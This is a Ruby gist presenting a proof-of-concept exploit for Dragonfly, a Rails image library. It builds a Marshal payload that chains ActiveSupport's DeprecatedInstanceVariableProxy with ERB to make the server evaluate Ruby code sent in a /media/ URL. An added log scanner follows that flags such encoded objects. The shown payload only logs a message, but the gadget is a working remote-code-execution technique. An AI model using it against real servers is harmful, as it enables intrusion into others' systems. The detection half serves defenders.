@sj26
Created November 14, 2013 09:04
Dragonfly marshal exploit PoC
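# If http://mysite.com/dragonfly responds, then:
require "base64"

string = "Here's a scary exploit"
# Ruby source the server ends up evaluating; here it only writes a log line.
code = "Rails.logger.info(#{string.inspect})"
# Hand-built Marshal stream: a DeprecatedInstanceVariableProxy whose @instance is an ERB object (@src = code) and whose @method is :result.
marshalled = "\x04\x08o:\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0E@instanceo:\x08ERB\x06:\x09@src" + Marshal.dump(code)[2..-1] + ":\x0C@method:\x0Bresult"
# Base64 with newlines and "=" padding stripped and "/" replaced by "~".
base64ed = Base64.encode64(marshalled).tr("\n=",'').tr('/','~')
# The encoded stream travels as a path segment under /media/.
url = "http://mysite.com/media/#{base64ed}/basename.format"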
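
The URL layout above (a Marshal stream, base64-encoded with `~` for `/`, carried under `/media/`) can be checked for in access logs. The following is an added example, not part of the gist or of Dragonfly: it decodes each job segment and reports any Marshal object tags without deserializing anything. The log format, the helper names and the shape of the benign job are assumptions, and the sample lines are constructed.

```ruby
# Added example (defensive): inspect Dragonfly-style job segments in access logs.
# Nothing here calls Marshal.load; the bytes are only pattern-matched.
MARSHAL_HEADER = "\x04\x08".b

# Reverse the URL encoding shown above: "~" stands for "/", "=" padding was stripped.
def decode_job_segment(segment)
  b64 = segment.tr("~", "/")
  b64 += "=" * ((4 - b64.length % 4) % 4)
  b64.unpack1("m").b # lenient base64 decode, binary result
end

# Class names attached to plain-object ("o") tags in a Marshal 4.8 stream.
# Heuristic: only short-form lengths (1..122 bytes) are recognised.
def marshal_object_classes(bytes)
  return [] unless bytes.start_with?(MARSHAL_HEADER)
  names = []
  bytes.scan(/o:([\x06-\x7f])/n) do
    len = Regexp.last_match(1).ord - 5
    name = Regexp.last_match.post_match[0, len]
    names << name if name.match?(/\A[A-Z]\w*(::[A-Z]\w*)*\z/)
  end
  names.uniq
end

# [path, classes] for every logged request whose /media/<job>/ segment names a class.
def flag_requests(log_lines)
  log_lines.filter_map do |line|
    path = line[/"(?:GET|HEAD) (\S+)/, 1] or next
    seg = path[%r{\A/media/([A-Za-z0-9+~]+)}, 1] or next
    classes = marshal_object_classes(decode_job_segment(seg))
    [path, classes] unless classes.empty?
  end
end

# Constructed samples. encode_segment mirrors the encoding used in the gist.
def encode_segment(bytes)
  [bytes].pack("m0").delete("=").tr("/", "~")
end
# Assumption: a legitimate job is a marshalled array of steps (no object tags).
BENIGN = encode_segment(Marshal.dump([[:f, "2013/logo.png"], [:p, :thumb, "100x100"]]))
# Inert byte string that only names a class; it is never deserialized.
OBJECT = encode_segment("\x04\x08o:\x08ERB\x00".b)
SAMPLE_LOG = [
  %(10.0.0.5 - - [14/Nov/2013:09:10:01 +0000] "GET /media/#{BENIGN}/logo.png HTTP/1.1" 200 5120),
  %(10.0.0.9 - - [14/Nov/2013:09:10:07 +0000] "GET /media/#{OBJECT}/basename.format HTTP/1.1" 500 0),
  %(10.0.0.5 - - [14/Nov/2013:09:10:09 +0000] "GET /assets/app.css HTTP/1.1" 200 900),
].freeze

flag_requests(SAMPLE_LOG).each { |path, classes| puts "#{classes.join(', ')}\t#{path}" }
```

A hit means the segment encodes an object rather than plain data, which is worth investigating whichever class is named; the byte scan is a heuristic and can misfire on string contents that happen to contain `o:`.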